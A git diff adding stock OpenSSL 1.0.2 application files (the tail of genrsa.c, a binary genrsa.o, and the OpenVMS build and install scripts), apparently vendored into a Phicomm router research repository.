+        else if (strcmp(*argv, "-idea") == 0)
+            enc = EVP_idea_cbc();
+# endif
+# ifndef OPENSSL_NO_SEED
+        else if (strcmp(*argv, "-seed") == 0)
+            enc = EVP_seed_cbc();
+# endif
+# ifndef OPENSSL_NO_AES
+        else if (strcmp(*argv, "-aes128") == 0)
+            enc = EVP_aes_128_cbc();
+        else if (strcmp(*argv, "-aes192") == 0)
+            enc = EVP_aes_192_cbc();
+        else if (strcmp(*argv, "-aes256") == 0)
+            enc = EVP_aes_256_cbc();
+# endif
+# ifndef OPENSSL_NO_CAMELLIA
+        else if (strcmp(*argv, "-camellia128") == 0)
+            enc = EVP_camellia_128_cbc();
+        else if (strcmp(*argv, "-camellia192") == 0)
+            enc = EVP_camellia_192_cbc();
+        else if (strcmp(*argv, "-camellia256") == 0)
+            enc = EVP_camellia_256_cbc();
+# endif
+        else if (strcmp(*argv, "-passout") == 0) {
+            if (--argc < 1)
+                goto bad;
+            passargout = *(++argv);
+        } else
+            break;
+        argv++;
+        argc--;
+    }
+    if ((argc >= 1) && ((sscanf(*argv, "%d", &num) == 0) || (num < 0))) {
+ bad:
+        BIO_printf(bio_err, "usage: genrsa [args] [numbits]\n");
+        BIO_printf(bio_err,
+                   " -des            encrypt the generated key with DES in cbc mode\n");
+        BIO_printf(bio_err,
+                   " -des3           encrypt the generated key with DES in ede cbc mode (168 bit key)\n");
+# ifndef OPENSSL_NO_IDEA
+        BIO_printf(bio_err,
+                   " -idea           encrypt the generated key with IDEA in cbc mode\n");
+# endif
+# ifndef OPENSSL_NO_SEED
+        BIO_printf(bio_err, " -seed\n");
+        BIO_printf(bio_err,
+                   "                 encrypt PEM output with cbc seed\n");
+# endif
+# ifndef OPENSSL_NO_AES
+        BIO_printf(bio_err, " -aes128, -aes192, -aes256\n");
+        BIO_printf(bio_err,
+                   "                 encrypt PEM output with cbc aes\n");
+# endif
+# ifndef OPENSSL_NO_CAMELLIA
+        BIO_printf(bio_err, " -camellia128, -camellia192, -camellia256\n");
+        BIO_printf(bio_err,
+                   "                 encrypt PEM output with cbc camellia\n");
+# endif
+        BIO_printf(bio_err, " -out file       output the key to 'file\n");
+        BIO_printf(bio_err,
+                   " -passout arg    output file pass phrase source\n");
+        BIO_printf(bio_err,
+                   " -f4             use F4 (0x10001) for the E value\n");
+        BIO_printf(bio_err, " -3              use 3 for the E value\n");
+# ifndef OPENSSL_NO_ENGINE
+        BIO_printf(bio_err,
+                   " -engine e       use engine e, possibly a hardware device.\n");
+# endif
+        BIO_printf(bio_err, " -rand file%cfile%c...\n", LIST_SEPARATOR_CHAR,
+                   LIST_SEPARATOR_CHAR);
+        BIO_printf(bio_err,
+                   "                 load the file (or the files in the directory) into\n");
+        BIO_printf(bio_err, "                 the random number generator\n");
+        goto err;
+    }
+
+    ERR_load_crypto_strings();
+
+    if (!app_passwd(bio_err, NULL, passargout, NULL, &passout)) {
+        BIO_printf(bio_err, "Error getting password\n");
+        goto err;
+    }
+# ifndef OPENSSL_NO_ENGINE
+    e = setup_engine(bio_err, engine, 0);
+# endif
+
+    if (outfile == NULL) {
+        BIO_set_fp(out, stdout, BIO_NOCLOSE);
+# ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+# endif
+    } else {
+        if (BIO_write_filename(out, outfile) <= 0) {
+            perror(outfile);
+            goto err;
+        }
+    }
+
+    if (!app_RAND_load_file(NULL, bio_err, 1) && inrand == NULL
+        && !RAND_status()) {
+        BIO_printf(bio_err,
+                   "warning, not much extra random data, consider using the -rand option\n");
+    }
+    if (inrand != NULL)
+        BIO_printf(bio_err, "%ld semi-random bytes loaded\n",
+                   app_RAND_load_files(inrand));
+
+    BIO_printf(bio_err, "Generating RSA private key, %d bit long modulus\n",
+               num);
+# ifdef OPENSSL_NO_ENGINE
+    rsa = RSA_new();
+# else
+    rsa = RSA_new_method(e);
+# endif
+    if (!rsa)
+        goto err;
+
+    if (!BN_set_word(bn, f4) || !RSA_generate_key_ex(rsa, num, bn, &cb))
+        goto err;
+
+    app_RAND_write_file(NULL, bio_err);
+
+    /*
+     * We need to do the following for when the base number size is < long,
+     * esp windows 3.1 :-(.
+     */
+    l = 0L;
+    for (i = 0; i < rsa->e->top; i++) {
+# ifndef SIXTY_FOUR_BIT
+        l <<= BN_BITS4;
+        l <<= BN_BITS4;
+# endif
+        l += rsa->e->d[i];
+    }
+    BIO_printf(bio_err, "e is %ld (0x%lX)\n", l, l);
+    {
+        PW_CB_DATA cb_data;
+        cb_data.password = passout;
+        cb_data.prompt_info = outfile;
+        if (!PEM_write_bio_RSAPrivateKey(out, rsa, enc, NULL, 0,
+                                         (pem_password_cb *)password_callback,
+                                         &cb_data))
+            goto err;
+    }
+
+    ret = 0;
+ err:
+    if (bn)
+        BN_free(bn);
+    if (rsa)
+        RSA_free(rsa);
+    if (out)
+        BIO_free_all(out);
+    if (passout)
+        OPENSSL_free(passout);
+    if (ret != 0)
+        ERR_print_errors(bio_err);
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
+
+static int MS_CALLBACK genrsa_cb(int p, int n, BN_GENCB *cb)
+{
+    char c = '*';
+
+    if (p == 0)
+        c = '.';
+    if (p == 1)
+        c = '+';
+    if (p == 2)
+        c = '*';
+    if (p == 3)
+        c = '\n';
+    BIO_write(cb->arg, &c, 1);
+    (void)BIO_flush(cb->arg);
+# ifdef LINT
+    p = n;
+# endif
+    return 1;
+}
+#else                           /* !OPENSSL_NO_RSA */
+
+# if PEDANTIC
+static void *dummy = &dummy;
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/genrsa.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/genrsa.o
new file mode 100644
index 0000000000000000000000000000000000000000..b8a194f6f0031d85fff85a110bcd42e160cf2776
GIT binary patch
literal 10760
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/install-apps.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/install-apps.com
new file mode 100755
index 0000000..7a553aa
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/install-apps.com
@@ -0,0 +1,107 @@
+$! INSTALL.COM -- Installs the files in a given directory tree
+$!
+$! Author: Richard Levitte <richard@levitte.org>
+$! Time of creation: 22-MAY-1998 10:13
+$!
+$! P1  root of the directory tree
+$! P2  "64" for 64-bit pointers.
+$!
+$!
+$! Announce/identify.
+$!
+$ proc = f$environment( "procedure")
+$ write sys$output "@@@ "+ -
+   f$parse( proc, , , "name")+ f$parse( proc, , , "type")
+$!
+$ on error then goto tidy
+$ on control_c then goto tidy
+$!
+$ if (p1 .eqs. "")
+$ then
+$   write sys$output "First argument missing."
+$   write sys$output -
+     "It should be the directory where you want things installed."
+$   exit
+$ endif
+$!
+$ if (f$getsyi("cpu") .lt. 128)
+$ then
+$   arch = "VAX"
+$ else
+$   arch = f$edit( f$getsyi( "arch_name"), "upcase")
+$   if (arch .eqs. "") then arch = "UNK"
+$ endif
+$!
+$ archd = arch
+$!
+$ if (p2 .nes. "")
+$ then
+$   if (p2 .eqs. "64")
+$   then
+$     archd = arch+ "_64"
+$   else
+$     if (p2 .nes. "32")
+$     then
+$       write sys$output "Second argument invalid."
+$       write sys$output "It should be "32", "64", or nothing."
+$       exit
+$     endif
+$   endif
+$ endif
+$!
+$ root = f$parse( p1, "[]A.;0", , , "syntax_only, no_conceal") - "A.;0"
+$ root_dev = f$parse(root,,,"device","syntax_only")
+$ root_dir = f$parse(root,,,"directory","syntax_only") - -
+   "[000000." - "][" - "[" - "]"
+$ root = root_dev + "[" + root_dir
+$!
+$ define /nolog wrk_sslroot 'root'.] /trans=conc
+$ define /nolog wrk_sslxexe wrk_sslroot:['archd'_exe]
+$!
+$ if f$parse("wrk_sslroot:[000000]") .eqs. "" then -
+   create /directory /log wrk_sslroot:[000000]
+$ if f$parse("wrk_sslxexe:") .eqs. "" then -
+   create /directory /log wrk_sslxexe:
+$!
+$ exe := openssl
+$!
+$ exe_dir := [-.'archd'.exe.apps]
+$!
+$! Executables.
+$!
+$ i = 0
+$ loop_exe:
+$   e = f$edit(f$element( i, ",", exe), "trim")
+$   i = i + 1
+$   if e .eqs. "," then goto loop_exe_end
+$   set noon
+$   file = exe_dir+ e+ ".exe"
+$   if f$search( file) .nes. ""
+$   then
+$     copy /protection = w:re 'file' wrk_sslxexe: /log
+$   endif
+$   set on
+$ goto loop_exe
+$ loop_exe_end:
+$!
+$! Miscellaneous.
+$!
+$ set noon
+$ copy /protection = w:re ca.com wrk_sslxexe:ca.com /log
+$ copy /protection = w:re openssl-vms.cnf wrk_sslroot:[000000]openssl.cnf /log
+$ set on
+$!
+$ tidy:
+$!
+$ call deass wrk_sslroot
+$ call deass wrk_sslxexe
+$!
+$ exit
+$!
+$ deass: subroutine
+$ if (f$trnlnm( p1, "LNM$PROCESS") .nes. "")
+$ then
+$   deassign /process 'p1'
+$ endif
+$ endsubroutine
+$!
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/makeapps.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/makeapps.com
new file mode 100644
index 0000000..47457af
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/makeapps.com
@@ -0,0 +1,1184 @@
+$!
+$!  MAKEAPPS.COM
+$!  Written By:  Robert Byer
+$!               Vice-President
+$!               A-Com Computing, Inc.
+$!               byer@mail.all-net.net
+$!
+$!  Changes by Richard Levitte <richard@levitte.org>
+$!             Zoltan Arpadffy <zoli@polarhome.com>   
+$!
+$!  This command files compiles and creates all the various different
+$!  "application" programs for the different types of encryption for OpenSSL.
+$!  The EXE's are placed in the directory [.xxx.EXE.APPS] where "xxx" denotes
+$!  ALPHA, IA64 or VAX, depending on your machine architecture.
+$!
+$!  It was written so it would try to determine what "C" compiler to
+$!  use or you can specify which "C" compiler to use.
+$!
+$!  Specify DEBUG or NODEBUG as P1 to compile with or without debugger
+$!  information.
+$!
+$!  Specify which compiler at P2 to try to compile under.
+$!
+$!	   VAXC	 For VAX C.
+$!	   DECC	 For DEC C.
+$!	   GNUC	 For GNU C.
+$!
+$!  If you don't specify a compiler, it will try to determine which
+$!  "C" compiler to use.
+$!
+$!  P3, if defined, sets a TCP/IP library to use, through one of the following
+$!  keywords:
+$!
+$!	UCX		for UCX
+$!	SOCKETSHR	for SOCKETSHR+NETLIB
+$!	TCPIP		for TCPIP (post UCX)
+$!
+$!  P4, if defined, sets a compiler thread NOT needed on OpenVMS 7.1 (and up)
+$!
+$!  P5, if defined, sets a choice of programs to compile.
+$!
+$!  P6, if defined, specifies the C pointer size.  Ignored on VAX.
+$!      ("64=ARGV" gives more efficient code with HP C V7.3 or newer.)
+$!      Supported values are:
+$!
+$!      ""       Compile with default (/NOPOINTER_SIZE)
+$!      32       Compile with /POINTER_SIZE=32 (SHORT)
+$!      64       Compile with /POINTER_SIZE=64[=ARGV] (LONG[=ARGV])
+$!               (Automatically select ARGV if compiler supports it.)
+$!      64=      Compile with /POINTER_SIZE=64 (LONG).
+$!      64=ARGV  Compile with /POINTER_SIZE=64=ARGV (LONG=ARGV).
+$!
+$!  P7, if defined, specifies a directory where ZLIB files (zlib.h,
+$!  libz.olb) may be found.  Optionally, a non-default object library
+$!  name may be included ("dev:[dir]libz_64.olb", for example).
+$!
+$!
+$! Announce/identify.
+$!
+$ proc = f$environment( "procedure")
+$ write sys$output "@@@ "+ -
+   f$parse( proc, , , "name")+ f$parse( proc, , , "type")
+$!
+$ on control_c then goto exit
+$!
+$! Define A TCP/IP Library That We Will Need To Link To.
+$! (That Is, If We Need To Link To One.)
+$!
+$ TCPIP_LIB = ""
+$ ZLIB_LIB = ""
+$!
+$! Check What Architecture We Are Using.
+$!
+$ IF (F$GETSYI("CPU").LT.128)
+$ THEN
+$!
+$!  The Architecture Is VAX.
+$!
+$   ARCH = "VAX"
+$!
+$! Else...
+$!
+$ ELSE
+$!
+$!  The Architecture Is Alpha, IA64 or whatever comes in the future.
+$!
+$   ARCH = F$EDIT( F$GETSYI( "ARCH_NAME"), "UPCASE")
+$   IF (ARCH .EQS. "") THEN ARCH = "UNK"
+$!
+$! End The Architecture Check.
+$!
+$ ENDIF
+$!
+$ ARCHD = ARCH
+$ LIB32 = "32"
+$ OPT_FILE = ""
+$ POINTER_SIZE = ""
+$!
+$! Define what programs should be compiled
+$!
+$ PROGRAMS := OPENSSL
+$!
+$! Check To Make Sure We Have Valid Command Line Parameters.
+$!
+$ GOSUB CHECK_OPTIONS
+$!
+$! Define The CRYPTO Library.
+$!
+$ CRYPTO_LIB := SYS$DISK:[-.'ARCHD'.EXE.CRYPTO]SSL_LIBCRYPTO'LIB32'.OLB
+$!
+$! Define The SSL Library.
+$!
+$ SSL_LIB := SYS$DISK:[-.'ARCHD'.EXE.SSL]SSL_LIBSSL'LIB32'.OLB
+$!
+$! Define The OBJ and EXE Directories.
+$!
+$ OBJ_DIR := SYS$DISK:[-.'ARCHD'.OBJ.APPS]
+$ EXE_DIR := SYS$DISK:[-.'ARCHD'.EXE.APPS]
+$!
+$! Specify the destination directory in any /MAP option.
+$!
+$ if (LINKMAP .eqs. "MAP")
+$ then
+$   LINKMAP = LINKMAP+ "=''EXE_DIR'"
+$ endif
+$!
+$! Add the location prefix to the linker options file name.
+$!
+$ if (OPT_FILE .nes. "")
+$ then
+$   OPT_FILE = EXE_DIR+ OPT_FILE
+$ endif
+$!
+$! Initialise logical names and such
+$!
+$ GOSUB INITIALISE
+$!
+$! Tell The User What Kind of Machine We Run On.
+$!
+$ WRITE SYS$OUTPUT "Host system architecture: ''ARCHD'"
+$!
+$! Check To See If The OBJ Directory Exists.
+$!
+$ IF (F$PARSE(OBJ_DIR).EQS."")
+$ THEN
+$!
+$!  It Dosen't Exist, So Create It.
+$!
+$   CREATE/DIRECTORY 'OBJ_DIR'
+$!
+$! End The OBJ Directory Check.
+$!
+$ ENDIF
+$!
+$! Check To See If The EXE Directory Exists.
+$!
+$ IF (F$PARSE(EXE_DIR).EQS."")
+$ THEN
+$!
+$!  It Dosen't Exist, So Create It.
+$!
+$   CREATE/DIRECTORY 'EXE_DIR'
+$!
+$! End The EXE Directory Check.
+$!
+$ ENDIF
+$!
+$! Check To See If We Have The Proper Libraries.
+$!
+$ GOSUB LIB_CHECK
+$!
+$! Check To See If We Have A Linker Option File.
+$!
+$ GOSUB CHECK_OPT_FILE
+$!
+$! Define The Application Files.
+$! NOTE: Some might think this list ugly.  However, it's made this way to
+$! reflect the E_OBJ variable in Makefile as closely as possible, thereby
+$! making it fairly easy to verify that the lists are the same.
+$!
+$ LIB_OPENSSL = "VERIFY,ASN1PARS,REQ,DGST,DH,DHPARAM,ENC,PASSWD,GENDH,ERRSTR,"+-
+	     	"CA,PKCS7,CRL2P7,CRL,"+-
+	      	"RSA,RSAUTL,DSA,DSAPARAM,EC,ECPARAM,"+-
+	      	"X509,GENRSA,GENDSA,GENPKEY,S_SERVER,S_CLIENT,SPEED,"+-
+	      	"S_TIME,APPS,S_CB,S_SOCKET,APP_RAND,VERSION,SESS_ID,"+-
+	      	"CIPHERS,NSEQ,PKCS12,PKCS8,PKEY,PKEYPARAM,PKEYUTL,"+ -
+	      	"SPKAC,SMIME,CMS,RAND,ENGINE,OCSP,PRIME,TS,SRP"
+$!
+$ LIB_OPENSSL = LIB_OPENSSL+ ",VMS_DECC_INIT"
+$!
+$ TCPIP_PROGRAMS = ",,"
+$ IF COMPILER .EQS. "VAXC" THEN -
+     TCPIP_PROGRAMS = ",OPENSSL,"
+$!
+$! Setup exceptional compilations
+$!
+$ COMPILEWITH_CC2 = ",S_SOCKET,S_SERVER,S_CLIENT,"
+$!
+$ PHASE := LIB
+$!
+$ RESTART: 
+$!
+$!  Define An App Counter And Set It To "0".
+$!
+$ APP_COUNTER = 0
+$!
+$!  Top Of The App Loop.
+$!
+$ NEXT_APP:
+$!
+$!  Make The Application File Name
+$!
+$ CURRENT_APP = F$EDIT(F$ELEMENT(APP_COUNTER,",",PROGRAMS),"TRIM")
+$!
+$!  Create The Executable File Name.
+$!
+$   EXE_FILE = EXE_DIR + CURRENT_APP + ".EXE"
+$!
+$!  Check To See If We Are At The End Of The File List.
+$!
+$ IF (CURRENT_APP.EQS.",")
+$ THEN
+$   IF (PHASE.EQS."LIB")
+$   THEN
+$     PHASE := APP
+$     GOTO RESTART
+$   ELSE
+$     GOTO APP_DONE
+$   ENDIF
+$ ENDIF
+$!
+$!  Increment The Counter.
+$!
+$ APP_COUNTER = APP_COUNTER + 1
+$!
+$!  Decide if we're building the object files or not.
+$!
+$ IF (PHASE.EQS."LIB")
+$ THEN
+$!
+$!  Define A Library File Counter And Set It To "-1".
+$!  -1 Means The Application File Name Is To Be Used.
+$!
+$   LIB_COUNTER = -1
+$!
+$!  Create a .OPT file for the object files
+$!
+$   OPEN /WRITE OBJECTS 'EXE_DIR''CURRENT_APP'.OPT
+$!
+$!  Top Of The File Loop.
+$!
+$  NEXT_LIB:
+$!
+$!  O.K, Extract The File Name From The File List.
+$!
+$   IF LIB_COUNTER .GE. 0
+$   THEN
+$     FILE_NAME = F$EDIT(F$ELEMENT(LIB_COUNTER,",",LIB_'CURRENT_APP'),"TRIM")
+$   ELSE
+$     FILE_NAME = CURRENT_APP
+$   ENDIF
+$!
+$!  Check To See If We Are At The End Of The File List.
+$!
+$   IF (FILE_NAME.EQS.",")
+$   THEN
+$     CLOSE OBJECTS
+$     GOTO NEXT_APP
+$   ENDIF
+$!
+$!  Increment The Counter.
+$!
+$   LIB_COUNTER = LIB_COUNTER + 1
+$!
+$!  Create The Source File Name.
+$!
+$   SOURCE_FILE = "SYS$DISK:[]" + FILE_NAME + ".C"
+$!
+$!  Create The Object File Name.
+$!
+$   OBJECT_FILE = OBJ_DIR + FILE_NAME + ".OBJ"
+$   ON WARNING THEN GOTO NEXT_LIB
+$!
+$!  Check To See If The File We Want To Compile Actually Exists.
+$!
+$   IF (F$SEARCH(SOURCE_FILE).EQS."")
+$   THEN
+$!
+$!    Tell The User That The File Dosen't Exist.
+$!
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "The File ",SOURCE_FILE," Dosen't Exist."
+$     WRITE SYS$OUTPUT ""
+$!
+$!    Exit The Build.
+$!
+$     GOTO EXIT
+$!
+$!  End The File Exist Check.
+$!
+$   ENDIF
+$!
+$!  Tell The User What We Are Building.
+$!
+$   IF (PHASE.EQS."LIB")
+$   THEN
+$     WRITE SYS$OUTPUT "Compiling The ",FILE_NAME,".C File."
+$   ELSE
+$     WRITE SYS$OUTPUT "Building The ",FILE_NAME," Application Program."
+$   ENDIF
+$!
+$!  Compile The File.
+$!
+$   ON ERROR THEN GOTO NEXT_LIB
+$   IF COMPILEWITH_CC2 - FILE_NAME .NES. COMPILEWITH_CC2
+$   THEN
+$     CC2/OBJECT='OBJECT_FILE' 'SOURCE_FILE'
+$   ELSE
+$     CC/OBJECT='OBJECT_FILE' 'SOURCE_FILE'
+$   ENDIF
+$   WRITE OBJECTS OBJECT_FILE
+$!
+$   GOTO NEXT_LIB
+$ ENDIF
+$!
+$!  Check if this program works well without a TCPIP library
+$!
+$ IF TCPIP_LIB .EQS. "" .AND. TCPIP_PROGRAMS - CURRENT_APP .NES. TCPIP_PROGRAMS
+$ THEN
+$   WRITE SYS$OUTPUT CURRENT_APP," needs a TCP/IP library.  Can't link.  Skipping..."
+$   GOTO NEXT_APP
+$ ENDIF
+$!
+$! Link The Program.
+$!
+$ ON WARNING THEN GOTO NEXT_APP
+$!
+$! Don't Link With The RSAREF Routines And TCP/IP Library.
+$!
+$ LINK /'DEBUGGER' /'LINKMAP' /'TRACEBACK' /EXE='EXE_FILE' -
+  'EXE_DIR''CURRENT_APP'.OPT /OPTIONS, -
+  'SSL_LIB' /LIBRARY, -
+  'CRYPTO_LIB' /LIBRARY -
+  'TCPIP_LIB' -
+  'ZLIB_LIB' -
+  ,'OPT_FILE' /OPTIONS
+$!
+$! Go Back And Do It Again.
+$!
+$ GOTO NEXT_APP
+$!
+$! All Done With This File.
+$!
+$ APP_DONE:
+$ EXIT:
+$!
+$! All Done, Time To Clean Up And Exit.
+$!
+$ GOSUB CLEANUP
+$ EXIT
+$!
+$! Check For The Link Option FIle.
+$!
+$ CHECK_OPT_FILE:
+$!
+$! Check To See If We Need To Make A VAX C Option File.
+$!
+$ IF (COMPILER.EQS."VAXC")
+$ THEN
+$!
+$!  Check To See If We Already Have A VAX C Linker Option File.
+$!
+$   IF (F$SEARCH(OPT_FILE).EQS."")
